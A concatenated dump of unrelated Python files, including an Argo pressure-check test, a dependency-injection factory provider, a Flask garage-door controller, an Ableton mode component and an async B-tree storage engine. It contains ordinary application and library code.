qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
truth[0] = True
assert numpy.array_equal(qc, truth), 'failed to flag pressure slightly below -5 '
# -5 OK
p = util.testingProfile.fakeProfile([5], obs_utils.pressure_to_depth([-5], 0.0), latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
assert numpy.array_equal(qc, truth), 'incorrectly flagging pressure of -5'
|
142752
|
import inspect
from typing import Callable, Dict, Hashable, Optional
from .service import Parameterized
from .._internal import API
from .._internal.utils import FinalImmutable, SlotRecord, debug_repr
from ..core import (Container, DependencyDebug, DependencyValue, Provider,
Scope)
@API.private
class FactoryProvider(Provider[Hashable]):
def __init__(self) -> None:
super().__init__()
self.__factories: Dict[FactoryDependency, Factory] = dict()
def __repr__(self) -> str:
return f"{type(self).__name__}(factories={list(self.__factories.keys())})"
def clone(self, keep_singletons_cache: bool) -> 'FactoryProvider':
p = FactoryProvider()
if keep_singletons_cache:
factories = {
k: (f.copy() if f.dependency is not None else f)
for k, f in self.__factories.items()
}
else:
factories = {
k: (f.copy(keep_function=False) if f.dependency is not None else f)
for k, f in self.__factories.items()
}
p.__factories = factories
return p
def exists(self, dependency: Hashable) -> bool:
# For now we don't support multiple factories for a single dependency. Neither
# is sharing the dependency with another provider. Simply because I don't see a
# use case where it would make sense.
        # Open for discussion though; create an issue if you have a use case.
if isinstance(dependency, Parameterized):
dependency = dependency.wrapped
return (isinstance(dependency, FactoryDependency)
and dependency in self.__factories)
def maybe_debug(self, dependency: Hashable) -> Optional[DependencyDebug]:
dependency_factory = (dependency.wrapped
if isinstance(dependency, Parameterized)
else dependency)
if not isinstance(dependency_factory, FactoryDependency):
return None
try:
factory = self.__factories[dependency_factory]
except KeyError:
return None
dependencies = []
wired = []
if factory.dependency is not None:
dependencies.append(factory.dependency)
if isinstance(factory.dependency, type) \
and inspect.isclass(factory.dependency):
wired.append(factory.dependency.__call__)
else:
wired.append(factory.function)
return DependencyDebug(debug_repr(dependency),
scope=factory.scope,
wired=wired,
dependencies=dependencies)
def maybe_provide(self, dependency: Hashable, container: Container
) -> Optional[DependencyValue]:
dependency_factory = (dependency.wrapped
if isinstance(dependency, Parameterized)
else dependency)
if not isinstance(dependency_factory, FactoryDependency):
return None
try:
factory = self.__factories[dependency_factory]
except KeyError:
return None
if factory.function is None:
f = container.provide(factory.dependency)
assert f.is_singleton(), "factory dependency is expected to be a singleton"
factory.function = f.unwrapped
if isinstance(dependency, Parameterized):
instance = factory.function(**dependency.parameters)
else:
instance = factory.function()
return DependencyValue(instance, scope=factory.scope)
def register(self,
output: type,
*,
scope: Optional[Scope],
factory: Callable[..., object] = None,
factory_dependency: Hashable = None
) -> 'FactoryDependency':
assert inspect.isclass(output) \
and (factory is None or factory_dependency is None) \
and (factory is None or callable(factory)) \
and (isinstance(scope, Scope) or scope is None)
dependency = FactoryDependency(output, factory or factory_dependency)
self._assert_not_duplicate(dependency)
if factory_dependency:
self.__factories[dependency] = Factory(scope,
dependency=factory_dependency)
else:
self.__factories[dependency] = Factory(scope,
function=factory)
return dependency
@API.private
class FactoryDependency(FinalImmutable):
__slots__ = ('output', 'factory', '__hash')
output: Hashable
factory: object
__hash: int
def __init__(self, output: Hashable, factory: object):
super().__init__(output, factory, hash((output, factory)))
def __repr__(self) -> str:
return f"FactoryDependency({self})"
def __antidote_debug_repr__(self) -> str:
return str(self)
def __str__(self) -> str:
return f"{debug_repr(self.output)} @ {debug_repr(self.factory)}"
# Custom hash & eq necessary to find duplicates
def __hash__(self) -> int:
return self.__hash
def __eq__(self, other: object) -> bool:
return (isinstance(other, FactoryDependency)
and self.__hash == other.__hash
and (self.output is other.output
or self.output == other.output)
and (self.factory is other.factory
or self.factory == other.factory)) # noqa
@API.private
class Factory(SlotRecord):
__slots__ = ('scope', 'function', 'dependency')
scope: Optional[Scope]
function: Callable[..., object]
dependency: Hashable
def __init__(self,
scope: Optional[Scope],
function: Callable[..., object] = None,
dependency: Hashable = None):
assert function is not None or dependency is not None
super().__init__(scope, function, dependency)
def copy(self, keep_function: bool = True) -> 'Factory':
return Factory(self.scope,
self.function if keep_function else None,
self.dependency)
|
142753
|
import logging
from logging.handlers import RotatingFileHandler
import os
import sys
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash, jsonify, has_request_context, send_from_directory, send_file
from common import constants
from common.db import GarageDb
from common.iftt import IftttEvent
from common.telegram import TelegramNotification
from webserver.client_api import GaragePiClient
import time
import csv
# ------------- Setup ------------
# Create our application
app = Flask(__name__, instance_relative_config=True)
# Set up logging
app.logger_name = "WEBSRVR"
file_handler = RotatingFileHandler(os.path.join(app.instance_path, 'garage_webserver.log'),
constants.LOGFILE_MODE, constants.LOGFILE_MAXSIZE,
constants.LOGFILE_BACKUP_COUNT)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(logging.Formatter(constants.LOGFILE_FORMAT))
app.logger.addHandler(file_handler)
app.debug_log_format = '%(relativeCreated)-6d [%(process)-5d:%(thread)#x] %(levelname)-5s %(message)s [in %(module)s @ %(pathname)s:%(lineno)d]'
app.logger.setLevel(logging.DEBUG)
# Log startup
app.logger.info('---------- Starting up!')
app.logger.info('__name__ is \'%s\'' % __name__)
# Load default config and override config from an environment variable
app.config.update(dict(
RELAY_PIN=7,
REED_PIN=18,
DOOR_OPENED=None, # 1 for open, 0 for closed
NEED_CLEANUP=False,
SECRET_KEY='', # should be overwritten by your app config!
))
# Load configuration
resource_path = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0]))) + os.sep + 'resource'
default_cfg_file = os.path.join(resource_path, 'default_app.cfg')
app.logger.debug('Loading default config file from \'%s\'' % default_cfg_file)
app.config.from_pyfile(default_cfg_file)
app.logger.debug('Looking for custom app config in \'%s\'' % os.path.join(app.instance_path, 'app.cfg'))
app.config.from_pyfile('app.cfg')
# -------------- App Context Resources ----------------
def get_api_client() -> GaragePiClient:
"""
Creates a new client api connector if there isn't one created
yet for the current application context.
"""
if not hasattr(g, 'api_client'):
g.api_client = GaragePiClient(app.logger, app.config['IPC_PORT'])
return g.api_client
def get_db() -> GarageDb:
"""
Creates a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = GarageDb(app.instance_path, resource_path)
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
app.logger.debug("Tearing down app context")
if hasattr(g, 'api_client'):
app.logger.debug("Tearing down app context: closing api client")
g.api_client.close()
# -------------- Routes ----------------
@app.route('/')
def show_control():
app.logger.debug('Received request for /')
return render_template('garage_control.html')
@app.route('/trigger', methods=['POST'])
def trigger_openclose():
app.logger.debug('Received POST to trigger')
if not session.get('logged_in'):
app.logger.warning('Refusing to trigger relay because not logged in!')
abort(401)
app.logger.debug('Triggering relay')
get_api_client().trigger_relay(request.headers.get('User-Agent') if has_request_context() else 'SERVER',
                                   app.config['USERNAME'])
app.logger.debug('Relay triggered')
flash('Relay successfully triggered')
return redirect(url_for('show_control'))
@app.route('/crack', methods=['POST'])
def trigger_crack():
app.logger.debug('Received POST to crack')
if not session.get('logged_in'):
app.logger.warning('Refusing to trigger relay because not logged in!')
abort(401)
app.logger.debug('Triggering relay')
get_api_client().trigger_relay(request.headers.get('User-Agent') if has_request_context() else 'SERVER',
                                   app.config['USERNAME'])
app.logger.debug('Relay triggered')
flash('Relay successfully triggered')
crack_delay = app.config['CRACK_DELAY']
time.sleep(crack_delay)
app.logger.debug('Triggering relay')
get_api_client().trigger_relay(request.headers.get('User-Agent') if has_request_context() else 'SERVER',
                                   app.config['USERNAME'])
app.logger.debug('Relay triggered')
flash('Relay successfully triggered')
return redirect(url_for('show_control'))
@app.route('/query_status')
def query_status() -> str:
status = get_api_client().get_status()
if status is None: return "{}"
return jsonify(status)
def get_status():
return get_api_client().get_status()
@app.route('/history')
def show_history():
db = get_db()
entries = db.read_history()
return render_template('history.html', entries=entries)
@app.route('/full_history')
def show_full_history():
db = get_db()
entries = db.read_full_history()
return render_template('full_history.html', entries=entries)
@app.route('/login', methods=['GET', 'POST'])
def login():
error = None
if request.method == 'POST':
if request.form['username'] != app.config['USERNAME']:
error = 'Invalid username'
elif request.form['password'] != app.config['PASSWORD']:
error = 'Invalid password'
else:
session['logged_in'] = True
session.permanent = True
flash('You were logged in')
return redirect(url_for('show_control'))
return render_template('login.html', error=error)
@app.route('/download')
def download():
db = get_db()
entries = db.read_full_history()
filename = 'history.csv'
with open(os.path.join(app.instance_path, filename),'w', newline='') as csv_file:
wr = csv.writer(csv_file, quoting=csv.QUOTE_ALL)
wr.writerow(["Time","Event","Description"])
for row in entries:
wr.writerow(row)
try:
return send_from_directory(os.path.join(app.instance_path), filename, as_attachment=True, attachment_filename=filename)
except:
abort(404)
@app.route('/logout')
def logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('show_control'))
# ----- Tests --------
@app.route('/test_zmq')
def test_zmq():
if not app.debug: return 'Only available when debug is set to True in application config.'
msg = request.args.get('msg')
app.logger.debug("Calling echo with message: {0}".format(msg))
message = get_api_client().echo(msg)
app.logger.debug("Returned from echo: {0}".format(message))
if message is None: return "Received no reply!"
return "Received reply [{0}]".format(message)
@app.route('/test_ifttt')
def test_ifttt():
if not app.debug: return 'Only available when debug is set to True in application config.'
maker_key = app.config['IFTTT_MAKER_KEY']
if not maker_key: return 'No maker key provided!'
event_name = request.args.get('event_name')
# if not event_name: return redirect(url_for('show_control'), code=302)
value1 = request.args.get('value1')
value2 = request.args.get('value2')
value3 = request.args.get('value3')
app.logger.debug("Testing IFTTT with: %r %r %r %r" % (event_name, value1, value2, value3))
event = IftttEvent(maker_key, request.args.get('event_name'), app.logger)
result = event.trigger(value1, value2, value3)
return 'Result: %r' % (result,)
@app.route('/test_telegram')
def test_telegram():
if not app.debug: return 'Only available when debug is set to True in application config.'
telegram_chat_id = str(app.config['APPRISE_TELEGRAM_CHAT_ID'])
telegram_key = str(app.config['APPRISE_TELEGRAM_KEY'])
if not telegram_key: return 'No Telegram key provided!'
app.logger.debug("Testing Telegram with %s and %s" % (telegram_key,telegram_chat_id))
event = TelegramNotification(telegram_key, telegram_chat_id, "Test notification from GaragePi", app.logger)
event.trigger()
return redirect(url_for('show_control'))
|
142783
|
from _Framework.ModesComponent import ModesComponent
class ModesComponentEx(ModesComponent):
"""
A special ModesComponent for the twister that lets us skin the mode buttons
"""
def set_mode_button(self, name, button):
if button:
button.set_on_off_values('Modes.Selected', 'Modes.NotSelected')
super(ModesComponentEx, self).set_mode_button(name, button)
|
142794
|
from asyncio import ensure_future, Lock, sleep, get_event_loop
from bisect import insort, bisect, bisect_left
from collections import UserList
from contextlib import suppress
from multiprocessing import Process
from os import rename, remove
from os.path import getsize, isfile
from pickle import load, UnpicklingError
from struct import pack, unpack
from .Allocator import Allocator
from .AsyncFile import AsyncFile
from .Node import IndexNode, ValueNode
from .TaskQue import TaskQue, Task
class SortedList(UserList):
def append(self, item):
insort(self.data, item)
OP = b'\x00'
ED = b'\x01'
MIN_DEGREE = 128
class BasicEngine:
    # Basic transaction engine
def __init__(self, filename: str):
if not isfile(filename):
with open(filename, 'wb') as file:
# indicator
file.write(OP)
# root
file.write(pack('Q', 9))
self.root = IndexNode(is_leaf=True)
self.root.dump(file)
else:
with open(filename, 'rb+') as file:
if file.read(1) == OP:
file.close()
p = Process(target=repair, args=(filename,))
p.start()
p.join()
return self.__init__(filename)
else:
ptr = unpack('Q', file.read(8))[0]
file.seek(ptr)
self.root = IndexNode(file=file)
file.seek(0)
file.write(OP)
self.allocator = Allocator()
self.async_file = AsyncFile(filename)
self.command_que = SortedList()
self.file = open(filename, 'rb+', buffering=0)
self.lock = Lock()
self.on_interval = (0, 1)
self.on_write = False
self.task_que = TaskQue()
def malloc(self, size: int) -> int:
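        # Allocate `size` bytes, extending the file if needed, and make sure the
        # returned region never overlaps the interval currently being written asynchronously.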
def is_inside(ptr: int) -> bool:
if self.on_write:
begin, end = self.on_interval
return min(ptr + size, end) - max(ptr, begin) >= 0
ptr = self.allocator.malloc(size)
if ptr and is_inside(ptr):
self.free(ptr, size)
ptr = 0
if not ptr:
ptr = self.async_file.size
if is_inside(ptr):
ptr += 1
self.async_file.size += 1
self.async_file.size += size
return ptr
def free(self, ptr: int, size: int):
self.allocator.free(ptr, size)
def time_travel(self, token: Task, node: IndexNode):
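        # Replay pending pointer updates from the task queue onto a freshly loaded
        # node, so readers see the in-flight state of its value/child pointers.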
address = node.nth_value_ads(0)
for i in range(len(node.ptrs_value)):
ptr = self.task_que.get(token, address, node.ptr)
if ptr:
node.ptrs_value[i] = ptr
address += 8
if not node.is_leaf:
for i in range(len(node.ptrs_child)):
ptr = self.task_que.get(token, address, node.ptr)
if ptr:
node.ptrs_child[i] = ptr
address += 8
def a_command_done(self, token: Task):
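        # One queued write command finished; once this token's last command completes,
        # clean the task queue and release the lock if nothing else is pending.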
token.command_num -= 1
if token.command_num == 0:
self.task_que.clean()
if not self.task_que.que and self.lock.locked():
self.lock.release()
    # Accumulate the pending changes: free replaced nodes, queue every write, and refresh the root
def do_cum(self, token: Task, free_nodes, command_map):
def func():
for node in free_nodes:
self.free(node.ptr, node.size)
token.free_param = func
for ptr, param in command_map.items():
data, depend = param if isinstance(param, tuple) else (param, 0)
self.ensure_write(token, ptr, data, depend)
self.time_travel(token, self.root)
self.root = self.root.clone()
def ensure_write(self, token: Task, ptr: int, data: bytes, depend=0):
async def coro():
while self.command_que:
ptr, token, data, depend = self.command_que.pop(0)
cancel = depend and self.task_que.is_canceled(token, depend)
if not cancel:
cancel = self.task_que.is_canceled(token, ptr)
if not cancel:
                    # Make sure allocated regions never touch the interval being written
self.on_interval = (ptr - 1, ptr + len(data) + 1)
await self.async_file.write(ptr, data)
self.a_command_done(token)
self.on_write = False
if not self.on_write:
self.on_write = True
ensure_future(coro())
        # Sorted by ptr and token.id
self.command_que.append((ptr, token, data, depend))
token.command_num += 1
def close(self):
self.file.seek(0)
self.file.write(ED)
self.file.close()
self.async_file.close()
def repair(filename: str):
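    # Rebuild a database that was not closed cleanly: replay every value record
    # found in the damaged file into a fresh engine, then replace the damaged
    # file with the rebuilt one.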
async def coro():
temp = '__' + filename
engine = Engine(temp)
size = getsize(filename)
with open(filename, 'rb') as file:
file.seek(9)
while file.tell() != size:
indicator = file.read(1)
if indicator != ED:
continue
with suppress(EOFError, UnpicklingError):
item = load(file)
if isinstance(item, tuple) and len(item) == 2:
engine.set(*item)
await sleep(0)
if engine.task_que.que:
await engine.lock.acquire()
await engine.lock.acquire()
engine.close()
remove(filename)
rename(temp, filename)
loop = get_event_loop()
loop.run_until_complete(coro())
class Engine(BasicEngine):
    # B-Tree core
async def get(self, key):
token = self.task_que.create(is_active=False)
token.command_num += 1
async def travel(ptr: int):
init = self.task_que.get(token, ptr, is_active=False)
if not init:
init = await self.async_file.exec(ptr, lambda f: IndexNode(file=f))
index = bisect(init.keys, key)
if init.keys[index - 1] == key:
ptr = self.task_que.get(token, init.nth_value_ads(index - 1), init.ptr) or init.ptrs_value[index - 1]
val = await self.async_file.exec(ptr, lambda f: ValueNode(file=f))
assert val.key == key
self.a_command_done(token)
return val.value
elif not init.is_leaf:
ptr = self.task_que.get(token, init.nth_child_ads(index), init.ptr) or init.ptrs_child[index]
return await travel(ptr)
else:
return self.a_command_done(token)
        # root ptrs are kept up to date in real time
index = bisect(self.root.keys, key)
if index - 1 >= 0 and self.root.keys[index - 1] == key:
ptr = self.root.ptrs_value[index - 1]
val = await self.async_file.exec(ptr, lambda f: ValueNode(file=f))
assert val.key == key
self.a_command_done(token)
return val.value
elif not self.root.is_leaf:
return await travel(self.root.ptrs_child[index])
else:
return self.a_command_done(token)
def set(self, key, value):
token = self.task_que.create(is_active=True)
free_nodes = []
# {..., ptr: data OR (data, depend)}
command_map = {}
def replace(address: int, ptr: int, depend: int):
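            # Overwrite an existing key: append a new ValueNode at the end of the
            # file and repoint the index entry at `address` to it.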
self.file.seek(ptr)
org_val = ValueNode(file=self.file)
if org_val.value != value:
                # Write the new value node
val = ValueNode(key, value)
self.file.seek(self.async_file.size)
val.dump(self.file)
self.async_file.size += val.size
                # Set the old value node's status byte to 0 (stale)
self.file.seek(org_val.ptr)
self.file.write(OP)
                # Free
free_nodes.append(org_val)
                # Sync
self.task_que.set(token, address, org_val.ptr, val.ptr)
                # Command
self.ensure_write(token, address, pack('Q', val.ptr), depend)
self.do_cum(token, free_nodes, command_map)
def split(address: int, par: IndexNode, child_index: int, child: IndexNode, depend: int):
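            # Split a full child into two nodes, promoting its median key into the
            # parent, and queue the rewritten nodes for writing.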
org_par = par.clone()
org_child = child.clone()
            # Give half of the keys to a new sibling
mi = (len(child.keys) - 1) // 2 + 1
sibling = IndexNode(is_leaf=child.is_leaf)
sibling.keys = child.keys[mi:]
sibling.ptrs_value = child.ptrs_value[mi:]
del child.keys[mi:]
del child.ptrs_value[mi:]
if not sibling.is_leaf:
sibling.ptrs_child = child.ptrs_child[mi:]
del child.ptrs_child[mi:]
            # The parent takes one value
par.keys.insert(child_index, child.keys.pop())
par.ptrs_value.insert(child_index, child.ptrs_value.pop())
            # Allocate space
child_b = bytes(child)
sibling_b = bytes(sibling)
child.ptr = self.malloc(child.size)
sibling.ptr = self.malloc(sibling.size)
par.ptrs_child[child_index] = child.ptr
par.ptrs_child.insert(child_index + 1, sibling.ptr)
par_b = bytes(par)
par.ptr = self.malloc(par.size)
            # Update complete
            # Free
free_nodes.extend((org_par, org_child))
            # Sync
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (org_child.ptr, org_child, _),
(par.ptr, _, par), (child.ptr, _, child), (sibling.ptr, _, sibling)):
self.task_que.set(token, ptr, head, tail)
            # Command
command_map.update({address: (pack('Q', par.ptr), depend),
par.ptr: par_b, child.ptr: child_b, sibling.ptr: sibling_b})
cursor = self.root
address = 1
depend = 0
        # The root is full
if len(cursor.keys) == 2 * MIN_DEGREE - 1:
            # Create a new root
root = IndexNode(is_leaf=False)
root.ptrs_child.append(self.root.ptr)
split(address, root, 0, self.root, depend)
self.root = cursor = root
index = bisect(cursor.keys, key)
        # Check whether the key already exists
if cursor.keys and cursor.keys[index - 1] == key:
return replace(cursor.nth_value_ads(index - 1), cursor.ptrs_value[index - 1], cursor.ptr)
        # Descend until a leaf node is reached
while not cursor.is_leaf:
index = bisect(cursor.keys, key)
ptr = cursor.ptrs_child[index]
child = self.task_que.get(token, ptr)
if not child:
self.file.seek(ptr)
child = IndexNode(file=self.file)
self.time_travel(token, child)
i = bisect_left(child.keys, key)
if i < len(child.keys) and child.keys[i] == key:
return replace(child.nth_value_ads(i), child.ptrs_value[i], child.ptr)
if len(child.keys) == 2 * MIN_DEGREE - 1:
split(address, cursor, index, child, depend)
if cursor.keys[index] < key:
                    # The path shifts to the sibling, which is guaranteed to be in the task_que
index += 1
ptr = cursor.ptrs_child[index]
child = self.task_que.get(token, ptr)
address = cursor.nth_child_ads(index)
depend = cursor.ptr
cursor = child
        # Reached a leaf node
val = ValueNode(key, value)
val_b = bytes(val)
val.ptr = self.malloc(val.size)
self.file.seek(val.ptr)
self.file.write(val_b)
org_cursor = cursor.clone()
index = bisect(cursor.keys, key)
cursor.keys.insert(index, val.key)
cursor.ptrs_value.insert(index, val.ptr)
cursor_b = bytes(cursor)
cursor.ptr = self.malloc(cursor.size)
        # Update complete
        # Free
free_nodes.append(org_cursor)
        # Sync
_ = None
for ptr, head, tail in ((address, org_cursor.ptr, cursor.ptr),
(org_cursor.ptr, org_cursor, _), (cursor.ptr, _, cursor)):
self.task_que.set(token, ptr, head, tail)
        # Command
command_map.update({address: (pack('Q', cursor.ptr), depend), cursor.ptr: cursor_b})
self.do_cum(token, free_nodes, command_map)
def pop(self, key):
token = self.task_que.create(is_active=True)
free_nodes = []
command_map = {}
def indicate(val: ValueNode):
self.file.seek(val.ptr)
self.file.write(OP)
free_nodes.append(val)
def fetch(ptr: int) -> IndexNode:
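            # Load an index node from disk unless a newer in-flight copy is
            # already available in the task queue.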
result = self.task_que.get(token, ptr)
if not result:
self.file.seek(ptr)
result = IndexNode(file=self.file)
self.time_travel(token, result)
return result
def left_to_right(address: int, par: IndexNode, val_index: int,
left_child: IndexNode, right_child: IndexNode, depend: int):
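            # Rotate the left child's last key up into the parent and the parent's
            # separator key down into the right child (borrow from the left sibling).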
org_par = par.clone()
org_left = left_child.clone()
org_right = right_child.clone()
            # In-memory updates
last_val_key = left_child.keys.pop()
last_val_ptr = left_child.ptrs_value.pop()
val_key = par.keys[val_index]
val_ptr = par.ptrs_value[val_index]
par.keys[val_index] = last_val_key
par.ptrs_value[val_index] = last_val_ptr
right_child.keys.insert(0, val_key)
right_child.ptrs_value.insert(0, val_ptr)
if not left_child.is_leaf:
last_ptr_child = left_child.ptrs_child.pop()
right_child.ptrs_child.insert(0, last_ptr_child)
            # Allocate space
left_b = bytes(left_child)
right_b = bytes(right_child)
left_child.ptr = self.malloc(left_child.size)
right_child.ptr = self.malloc(right_child.size)
par.ptrs_child[val_index] = left_child.ptr
par.ptrs_child[val_index + 1] = right_child.ptr
par_b = bytes(par)
par.ptr = self.malloc(par.size)
            # Update complete
            # Free
free_nodes.extend((org_par, org_left, org_right))
            # Sync
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (par.ptr, _, par),
(org_left.ptr, org_left, _), (left_child.ptr, _, left_child),
(org_right.ptr, org_right, _), (right_child.ptr, _, right_child)):
self.task_que.set(token, ptr, head, tail)
            # Command
command_map.update({address: (pack('Q', par.ptr), depend),
par.ptr: par_b, left_child.ptr: left_b, right_child.ptr: right_b})
def right_to_left(address: int, par: IndexNode, val_index: int,
left_child: IndexNode, right_child: IndexNode, depend: int):
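            # Rotate the right child's first key up into the parent and the parent's
            # separator key down into the left child (borrow from the right sibling).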
org_par = par.clone()
org_left = left_child.clone()
org_right = right_child.clone()
            # In-memory updates
first_val_key = right_child.keys.pop(0)
first_val_ptr = right_child.ptrs_value.pop(0)
val_key = par.keys[val_index]
val_ptr = par.ptrs_value[val_index]
par.keys[val_index] = first_val_key
par.ptrs_value[val_index] = first_val_ptr
left_child.keys.append(val_key)
left_child.ptrs_value.append(val_ptr)
if not right_child.is_leaf:
first_ptr_child = right_child.ptrs_child.pop(0)
left_child.ptrs_child.append(first_ptr_child)
            # Allocate space
left_b = bytes(left_child)
right_b = bytes(right_child)
left_child.ptr = self.malloc(left_child.size)
right_child.ptr = self.malloc(right_child.size)
par.ptrs_child[val_index] = left_child.ptr
par.ptrs_child[val_index + 1] = right_child.ptr
par_b = bytes(par)
par.ptr = self.malloc(par.size)
            # Update complete
            # Free
free_nodes.extend((org_par, org_left, org_right))
            # Sync
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (par.ptr, _, par),
(org_left.ptr, org_left, _), (left_child.ptr, _, left_child),
(org_right.ptr, org_right, _), (right_child.ptr, _, right_child)):
self.task_que.set(token, ptr, head, tail)
            # Command
command_map.update({address: (pack('Q', par.ptr), depend),
par.ptr: par_b, left_child.ptr: left_b, right_child.ptr: right_b})
def merge_left(address: int, par: IndexNode, val_index: int,
left_child: IndexNode, cursor: IndexNode, depend: int):
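            # Merge the left sibling, the separator key from the parent and the
            # current node into a single node.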
org_par = par.clone()
org_cursor = cursor.clone()
            # In-memory updates
val_key = par.keys.pop(val_index)
val_ptr = par.ptrs_value.pop(val_index)
del par.ptrs_child[val_index]
cursor.keys = [*left_child.keys, val_key, *cursor.keys]
cursor.ptrs_value = [*left_child.ptrs_value, val_ptr, *cursor.ptrs_value]
if not left_child.is_leaf:
cursor.ptrs_child = [*left_child.ptrs_child, *cursor.ptrs_child]
            # Allocate space
cursor_b = bytes(cursor)
cursor.ptr = self.malloc(cursor.size)
par.ptrs_child[val_index] = cursor.ptr
par_b = bytes(par)
par.ptr = self.malloc(par.size)
            # Update complete
            # Free
free_nodes.extend((org_par, org_cursor, left_child))
            # Sync
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (par.ptr, _, par),
(org_cursor.ptr, org_cursor, _), (cursor.ptr, _, cursor),
(left_child.ptr, left_child, _)):
self.task_que.set(token, ptr, head, tail)
            # Command
command_map.update({address: (pack('Q', par.ptr), depend), par.ptr: par_b, cursor.ptr: cursor_b})
def merge_right(address: int, par: IndexNode, val_index: int,
cursor: IndexNode, right_child: IndexNode, depend: int):
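            # Merge the current node, the separator key from the parent and the
            # right sibling into a single node.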
org_par = par.clone()
org_cursor = cursor.clone()
            # In-memory updates
val_key = par.keys.pop(val_index)
val_ptr = par.ptrs_value.pop(val_index)
del par.ptrs_child[val_index + 1]
cursor.keys.extend((val_key, *right_child.keys))
cursor.ptrs_value.extend((val_ptr, *right_child.ptrs_value))
if not cursor.is_leaf:
cursor.ptrs_child.extend(right_child.ptrs_child)
            # Allocate space
cursor_b = bytes(cursor)
cursor.ptr = self.malloc(cursor.size)
par.ptrs_child[val_index] = cursor.ptr
par_b = bytes(par)
par.ptr = self.malloc(par.size)
            # Update complete
            # Free
free_nodes.extend((org_par, org_cursor, right_child))
            # Sync
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (par.ptr, _, par),
(org_cursor.ptr, org_cursor, _), (cursor.ptr, _, cursor),
(right_child.ptr, right_child, _)):
self.task_que.set(token, ptr, head, tail)
            # Command
command_map.update({address: (pack('Q', par.ptr), depend), par.ptr: par_b, cursor.ptr: cursor_b})
def travel(address: int, init: IndexNode, key, depend: int):
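            # Recursively descend from `init`, rebalancing on the way down so that
            # every visited child has at least MIN_DEGREE keys before deleting `key`.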
index = bisect(init.keys, key) - 1
def key_in_leaf():
org_init = init.clone()
self.file.seek(init.ptrs_value[index])
val = ValueNode(file=self.file)
                # In-memory updates
del init.keys[index]
del init.ptrs_value[index]
                # Allocate space
init_b = bytes(init)
init.ptr = self.malloc(init.size)
                # Free
indicate(val)
free_nodes.append(org_init)
                # Sync
_ = None
for ptr, head, tail in ((address, org_init.ptr, init.ptr),
(org_init.ptr, org_init, _), (init.ptr, _, init)):
self.task_que.set(token, ptr, head, tail)
                # Command
command_map.update({address: (pack('Q', init.ptr), depend), init.ptr: init_b})
return val.value
def root_empty(successor: IndexNode):
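                # The root has run out of keys: promote `successor` as the new root.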
free_nodes.append(self.root)
_ = None
for ptr, head, tail in ((address, self.root.ptr, successor.ptr),
(self.root.ptr, self.root, _), (successor.ptr, _, successor)):
self.task_que.set(token, ptr, head, tail)
command_map[address] = pack('Q', successor.ptr)
self.root = successor
            # The key has been located
if index >= 0 and init.keys[index] == key:
                # In a leaf node
if init.is_leaf:
return key_in_leaf()
                # In an internal node
else:
left_ptr = init.ptrs_child[index]
left_child = fetch(left_ptr)
right_ptr = init.ptrs_child[index + 1]
right_child = fetch(right_ptr)
                    # Left child has >= t keys
if len(left_child.keys) >= MIN_DEGREE:
left_to_right(address, init, index, left_child, right_child, depend)
return travel(init.nth_child_ads(index + 1), right_child, key, init.ptr)
                    # Right child has >= t keys
elif len(right_child.keys) >= MIN_DEGREE:
right_to_left(address, init, index, left_child, right_child, depend)
return travel(init.nth_child_ads(index), left_child, key, init.ptr)
                    # Both children have < t keys
else:
merge_left(address, init, index, left_child, right_child, depend)
if len(self.root.keys) == 0:
root_empty(right_child)
return travel(init.nth_child_ads(index), right_child, key, init.ptr)
            # Keep searching downwards
elif not init.is_leaf:
index += 1
ptr = init.ptrs_child[index]
cursor = fetch(ptr)
                # Target child has < t keys
if len(cursor.keys) < MIN_DEGREE:
left_sibling = right_sibling = None
if index - 1 >= 0:
left_ptr = init.ptrs_child[index - 1]
left_sibling = fetch(left_ptr)
                        # Left sibling has >= t keys
if len(left_sibling.keys) >= MIN_DEGREE:
left_to_right(address, init, index - 1, left_sibling, cursor, depend)
return travel(init.nth_child_ads(index), cursor, key, init.ptr)
if index + 1 < len(init.ptrs_child):
right_ptr = init.ptrs_child[index + 1]
right_sibling = fetch(right_ptr)
                        # Right sibling has >= t keys
if len(right_sibling.keys) >= MIN_DEGREE:
right_to_left(address, init, index, cursor, right_sibling, depend)
return travel(init.nth_child_ads(index), cursor, key, init.ptr)
                    # Neither sibling has >= t keys
if left_sibling:
index -= 1
merge_left(address, init, index, left_sibling, cursor, depend)
else:
merge_right(address, init, index, cursor, right_sibling, depend)
if len(self.root.keys) == 0:
root_empty(cursor)
return travel(init.nth_child_ads(index), cursor, key, init.ptr)
travel(1, self.root, key, 0)
self.do_cum(token, free_nodes, command_map)
async def items(self, item_from=None, item_to=None, max_len=0, reverse=False):
assert item_from <= item_to if item_from and item_to else True
token = self.task_que.create(is_active=False)
token.command_num += 1
result = []
async def travel(init: IndexNode):
async def get_item(index: int):
ptr = init.ptrs_value[index]
val = await self.async_file.exec(ptr, lambda f: ValueNode(file=f))
return val.key, val.value
async def get_child(index: int) -> IndexNode:
ptr = init.ptrs_child[index]
child = self.task_que.get(token, ptr, is_active=False)
if not child:
child = await self.async_file.exec(ptr, lambda f: IndexNode(file=f))
self.time_travel(token, child)
return child
# lo_key >= item_from
# hi_key > item_to
lo = 0 if item_from is None else bisect_left(init.keys, item_from)
hi = len(init.keys) if item_to is None else bisect(init.keys, item_to)
extend = not init.is_leaf and (item_from is None or lo == len(init.keys) or init.keys[lo] > item_from)
if not reverse and extend:
await travel(await get_child(lo))
for i in range(lo, hi) if not reverse else reversed(range(lo, hi)):
if reverse and not init.is_leaf:
await travel(await get_child(i + 1))
if max_len and len(result) >= max_len:
return
item = await get_item(i)
result.append(item)
if not reverse and not init.is_leaf:
await travel(await get_child(i + 1))
